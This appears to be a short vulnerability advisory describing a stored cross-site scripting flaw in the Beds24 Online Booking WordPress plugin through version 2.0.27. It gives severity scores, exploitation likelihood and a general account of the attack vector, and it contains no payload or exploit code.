A stored cross‑site scripting flaw exists in the Beds24 Online Booking WordPress plugin that allows an attacker to inject malicious JavaScript into pages generated by the plugin. This vulnerability is caused by improper neutralization of input; data entered through the plugin can be stored and later rendered without adequate sanitization. Based on the description, it is inferred that an attacker could execute arbitrary scripts in the context of a victim’s browser, potentially affecting confidentiality, integrity, and availability of the affected site or user data.

Beds24 Online Booking, a WordPress plugin developed by markkinchin, is affected for all releases through 2.0.27.

The CVSS score of 6.5 indicates a moderately high severity, while the EPSS score of less than 1% suggests that, at present, exploitation is unlikely to be widespread or automated. The vulnerability is not listed in the CISA KEV catalog. Based on the description, the likely attack vector involves a user or attacker submitting crafted input via plugin configuration or form fields that is then stored and displayed on subsequent page loads. The attack requires the victim to visit a page containing the injected script, making it a classic stored XSS scenario. Because the exploit can be triggered by any user with access to the plugin’s data entry mechanism, the risk remains significant for sites that rely on the plugin to display untrusted content.